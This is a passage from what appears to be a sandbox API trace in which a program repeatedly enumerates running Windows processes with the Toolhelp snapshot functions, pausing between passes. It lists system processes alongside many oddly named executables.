th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.899] CloseHandle (hObject=0xc4) returned 1 [0106.899] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0106.904] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.904] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.905] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.906] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.906] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.907] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.908] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.908] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.909] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.910] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.911] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.911] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.912] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.913] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.914] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.914] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.915] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.916] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.918] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.919] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.920] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.921] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.922] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.923] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.924] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.925] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.927] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.928] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.929] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.931] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.963] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.964] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0106.982] CloseHandle (hObject=0xbc) returned 1 [0106.982] Sleep (dwMilliseconds=0x12c) [0107.337] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0107.342] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.342] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.343] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.343] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.344] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.345] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.345] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.346] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.347] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.347] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.348] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.349] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.349] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.350] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.351] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.352] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.353] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.353] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.354] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.355] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.356] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.357] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.359] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.360] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, 